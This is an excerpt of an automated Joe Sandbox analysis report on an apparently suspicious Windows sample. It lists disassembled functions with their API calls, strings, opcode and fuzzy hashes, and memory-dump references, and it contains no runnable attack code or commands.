Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 89d4621985484a7c39ce2cc21f846ff8886d4a9fc1b968fdcc90cf8352c851ba
Instruction ID: 33a99dbde33afc1968d0a7607c3268fadad898fdfb594c4f7267fe47cb68ab15
Opcode Fuzzy Hash: 89d4621985484a7c39ce2cc21f846ff8886d4a9fc1b968fdcc90cf8352c851ba
Instruction Fuzzy Hash: 195104A16047D53DFB3A82348845BBE7EAABB46304F08C589E1DDC58D3C798E8C4D352

Function 0087ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0087AD19
GetKeyboardState.USER32(?), ref: 0087AD2E
SetKeyboardState.USER32(?), ref: 0087AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0087ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0087ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0087AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0087AE38

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: aaeca2b9031f2608062bc0cca36f1ecb2f8fb1eabaa1d5f627f996af86b3e25c
Instruction ID: 4b3781c652a2dcb32c86ab328c312986c2f4e6072bad7ba9b6d92dad0a857095
Opcode Fuzzy Hash: aaeca2b9031f2608062bc0cca36f1ecb2f8fb1eabaa1d5f627f996af86b3e25c
Instruction Fuzzy Hash: C251C5A15047D53DFB3A83648C95BBE7EA9FB86300F08C489E1DDD68C6D294EC84D752

Function 0084542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00853CD6,?,?,?,?,?,?,?,?,00845BA3,?,?,00853CD6,?,?), ref: 00845470
__fassign.LIBCMT ref: 008454EB
__fassign.LIBCMT ref: 00845506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00853CD6,00000005,00000000,00000000), ref: 0084552C
WriteFile.KERNEL32(?,00853CD6,00000000,00845BA3,00000000,?,?,?,?,?,?,?,?,?,00845BA3,?), ref: 0084554B
WriteFile.KERNEL32(?,?,00000001,00845BA3,00000000,?,?,?,?,?,?,?,?,?,00845BA3,?), ref: 00845584

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 80da4c42a1db080242869f9ab43e5be0e77f7c4561ca4bdb59109225137c5702
Instruction ID: 3f6f4d0fb785ecb971c9fc8c5e336b151066d841016747b135c1fa74180a337b
Opcode Fuzzy Hash: 80da4c42a1db080242869f9ab43e5be0e77f7c4561ca4bdb59109225137c5702
Instruction Fuzzy Hash: DF51E3B0A0064DAFDB11CFA8D895AEEBBF9FF09300F15451AF555E7292E7309A41CB60

Function 00832D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00832D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00832D53
_ValidateLocalCookies.LIBCMT ref: 00832DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00832E0C
_ValidateLocalCookies.LIBCMT ref: 00832E61

Strings

csm, xrefs: 00832DF6

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 44aa3e4b4c5d8ef22457d68293bfcf152aaaa9ae8b8a55b4c982e41a14b1f631
Instruction ID: 2519ebbb97768f8adae416334e7c17beba880da7f06dcbb522b5608686b1f228
Opcode Fuzzy Hash: 44aa3e4b4c5d8ef22457d68293bfcf152aaaa9ae8b8a55b4c982e41a14b1f631
Instruction Fuzzy Hash: 5A418C34A0020DEBCF10DF68C845A9EBBA5FF85328F148165E915EB392DB35AA15CBD1

Function 008910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0089304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0089307A
Part of subcall function 0089304E: _wcslen.LIBCMT ref: 0089309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00891112
WSAGetLastError.WSOCK32 ref: 00891121
WSAGetLastError.WSOCK32 ref: 008911C9
closesocket.WSOCK32(00000000), ref: 008911F9

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: d6eb21cdfded9dd29f68995d0a6e8e8df0233cd922102bf092b32e98da8195f5
Instruction ID: f2717c2f1d67d344b12423ea05b33808d4ff7d31b1eb2ae6e14478b846b77dfd
Opcode Fuzzy Hash: d6eb21cdfded9dd29f68995d0a6e8e8df0233cd922102bf092b32e98da8195f5
Instruction Fuzzy Hash: 8B41D431600205AFEF10AF18C888BA9BBE9FF45364F188059F915DB291DB74ED81CBA1

Function 0087CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0087DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0087CF22,?), ref: 0087DDFD

Part of subcall function 0087DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0087CF22,?), ref: 0087DE16

lstrcmpiW.KERNEL32(?,?), ref: 0087CF45
MoveFileW.KERNEL32(?,?), ref: 0087CF7F
_wcslen.LIBCMT ref: 0087D005
_wcslen.LIBCMT ref: 0087D01B
SHFileOperationW.SHELL32(?), ref: 0087D061

Strings

\*.*, xrefs: 0087CFF3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 9c6a9b9d9eeb0f6a9fe6083ab725cbeac66b3bd8beb6c819263174b6dc185d8c
Instruction ID: 789d712bffeef1b8987f604361bd2070f4ff653fc27aaaf4a2a35338963cda82
Opcode Fuzzy Hash: 9c6a9b9d9eeb0f6a9fe6083ab725cbeac66b3bd8beb6c819263174b6dc185d8c
Instruction Fuzzy Hash: E74142719052185FDF12EFA4C981ADEB7B8FF49380F0040EAE549EB145EE74E688CB51

Function 008A2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008A2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 008A2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 008A2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008A2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008A2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 008A2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008A2F0B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 3ccfd5d6c443ae5e36e4406cd436f4c9f23036e2d97b853e9b6ece2944c2e02c
Instruction ID: fbab4a08932be16223c4ca9284c096d919ba355cbc0d4d3b47250a2e22a91273
Opcode Fuzzy Hash: 3ccfd5d6c443ae5e36e4406cd436f4c9f23036e2d97b853e9b6ece2944c2e02c
Instruction Fuzzy Hash: C531E130604294AFEB21DF5CDC88F657BE1FB9A710F1501A4F901CF6A2CB71A8A0DB41

Function 00877726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00877769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0087778F
SysAllocString.OLEAUT32(00000000), ref: 00877792
SysAllocString.OLEAUT32(?), ref: 008777B0
SysFreeString.OLEAUT32(?), ref: 008777B9
StringFromGUID2.OLE32(?,?,00000028), ref: 008777DE
SysAllocString.OLEAUT32(?), ref: 008777EC

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 5761bf30ef86e589bc1acacf329814d66ec0d029e1fbe7744f67f1485147a8e3
Instruction ID: ab802792089b92afd14a04dfbe79168e1a0022f43fb7669558252f410c735ddf
Opcode Fuzzy Hash: 5761bf30ef86e589bc1acacf329814d66ec0d029e1fbe7744f67f1485147a8e3
Instruction Fuzzy Hash: 6721B076604219AFEB14DFA8DC88CBB77ECFB093A47008025FA18DB165D670DC41C764

Function 008777FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00877842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00877868
SysAllocString.OLEAUT32(00000000), ref: 0087786B
SysAllocString.OLEAUT32 ref: 0087788C
SysFreeString.OLEAUT32 ref: 00877895
StringFromGUID2.OLE32(?,?,00000028), ref: 008778AF
SysAllocString.OLEAUT32(?), ref: 008778BD

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a4568afef0c3b678ed598918ad19ac81a408d55cdf807c5d0ffdbea53e65ed45
Instruction ID: 3f68255f2af33869cb9c6c2befebca7033dc2362b1e79d7de22e2b5fb7837ccd
Opcode Fuzzy Hash: a4568afef0c3b678ed598918ad19ac81a408d55cdf807c5d0ffdbea53e65ed45
Instruction Fuzzy Hash: 20216035608218AFEB109FA8DC88DBA77ECFB097607108135F919CB2A5DA74DC41CB69

Function 008804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 008804F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0088052E

Strings

nul, xrefs: 00880567

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 849e4582fb02f90544b8a9064625d9e63365d36ea2c31d60a35bfc260d5750a3
Instruction ID: a59fdfc204b9c09e468b5dedc28c98ccf9fd81d57bd119762be09233a451cc7b
Opcode Fuzzy Hash: 849e4582fb02f90544b8a9064625d9e63365d36ea2c31d60a35bfc260d5750a3
Instruction Fuzzy Hash: 80213D75600305AFDB60AF69DC44A9A77E4FF45724F204A19F8A1E62E1E7709958CF30

Function 008805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008805C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00880601

Strings

nul, xrefs: 00880639

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 3c009bd4d5fd66a703a80190741526ff815129618392a5a7689c29842787e738
Instruction ID: 6c613343cd4feeecbb2e8785d80594f6a9a4e313ec38543aa5d1de3ee7448fa5
Opcode Fuzzy Hash: 3c009bd4d5fd66a703a80190741526ff815129618392a5a7689c29842787e738
Instruction Fuzzy Hash: A62181755003059FDB60AF698C04A9A77E4FFA5724F200B19F8A1E72E0E7709864CF20

Function 008A40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0081600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0081604C
Part of subcall function 0081600E: GetStockObject.GDI32(00000011), ref: 00816060
Part of subcall function 0081600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008A4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008A411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008A412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008A4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008A4145

Strings

Msctls_Progress32, xrefs: 008A40E3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c13d5487db977a2465090fb125f6867dc59cad3f08ca6375ba56f24fd5fd489b
Instruction ID: add745b5157f803081b7b7a03e1085df5723cafcec251d3c06a172c7475b2c9b
Opcode Fuzzy Hash: c13d5487db977a2465090fb125f6867dc59cad3f08ca6375ba56f24fd5fd489b
Instruction Fuzzy Hash: 2B1190B214021DBEFF118E64CC85EE77F9DFF09798F005121BA18E6150CAB29C619BA4

Function 0084D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0084D7A3: _free.LIBCMT ref: 0084D7CC

_free.LIBCMT ref: 0084D82D

Part of subcall function 008429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000), ref: 008429DE
Part of subcall function 008429C8: GetLastError.KERNEL32(00000000,?,0084D7D1,00000000,00000000,00000000,00000000,?,0084D7F8,00000000,00000007,00000000,?,0084DBF5,00000000,00000000), ref: 008429F0

_free.LIBCMT ref: 0084D838
_free.LIBCMT ref: 0084D843
_free.LIBCMT ref: 0084D897
_free.LIBCMT ref: 0084D8A2
_free.LIBCMT ref: 0084D8AD
_free.LIBCMT ref: 0084D8B8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: e0b3f7f2c545c1e874a6e9a482f29263a3d30fe51ad632c298dc8fa4746682b6
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 5111F971544B08AAEA21BFB5CC46FCB7F9CFF04700F804825B299E6692DA75A5058662

Function 0087DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0087DA74
LoadStringW.USER32(00000000), ref: 0087DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0087DA91
LoadStringW.USER32(00000000), ref: 0087DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0087DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0087DAB9

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 3dcfab05ada66b28a97f6226d29d3d78676af7620619d97e22045be82d88521c
Instruction ID: 60c190476077b3002e2db3fe689c9b5251df8dda362ed7277b3f3b1538591e29
Opcode Fuzzy Hash: 3dcfab05ada66b28a97f6226d29d3d78676af7620619d97e22045be82d88521c
Instruction Fuzzy Hash: 87014BF29002187FF710ABA49D89EEA776CFB09301F404496B74AE2441EA749E848B74

Function 0088096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00CFFA20,00CFFA20), ref: 0088097B
EnterCriticalSection.KERNEL32(00CFFA00,00000000), ref: 0088098D
TerminateThread.KERNEL32(00CFFA18,000001F6), ref: 0088099B
WaitForSingleObject.KERNEL32(00CFFA18,000003E8), ref: 008809A9
CloseHandle.KERNEL32(00CFFA18), ref: 008809B8
InterlockedExchange.KERNEL32(00CFFA20,000001F6), ref: 008809C8
LeaveCriticalSection.KERNEL32(00CFFA00), ref: 008809CF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e3243154a9b06686e0c69d3d9972d9a1cb8d6024d72a9c7632837aace24021c9
Instruction ID: 38f1ce82c4f2279c02f0eaafe1077900a83071f5287d0b5114491f2e753c0b0a
Opcode Fuzzy Hash: e3243154a9b06686e0c69d3d9972d9a1cb8d6024d72a9c7632837aace24021c9
Instruction Fuzzy Hash: 9DF0EC32542A12BBE7515FA4EE8DBD6BB39FF06702F402025F20290CA1DB759465CF90

Function 00891C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00891DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00891DE1
WSAGetLastError.WSOCK32 ref: 00891DF2
htons.WSOCK32(?,?,?,?,?), ref: 00891EDB
inet_ntoa.WSOCK32(?), ref: 00891E8C

Part of subcall function 008739E8: _strlen.LIBCMT ref: 008739F2

Part of subcall function 00893224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0088EC0C), ref: 00893240

_strlen.LIBCMT ref: 00891F35

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: c1259c901436a8d7eb7e97bd67c75557afe1320925d726cca1c0cc91c2c3d31a
Instruction ID: 47c55770b48cfa7a4974fbed12bfdd48e4bbd44adee96f3dd12098c5b2f5c87e
Opcode Fuzzy Hash: c1259c901436a8d7eb7e97bd67c75557afe1320925d726cca1c0cc91c2c3d31a
Instruction Fuzzy Hash: F2B1C4312083019FDB14EF28C899E6A77A5FF85318F58855CF4569B2E2DB31ED81CB92

Function 008401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 008400BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008400D6
__allrem.LIBCMT ref: 008400ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0084010B
__allrem.LIBCMT ref: 00840122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00840140

Memory Dump Source

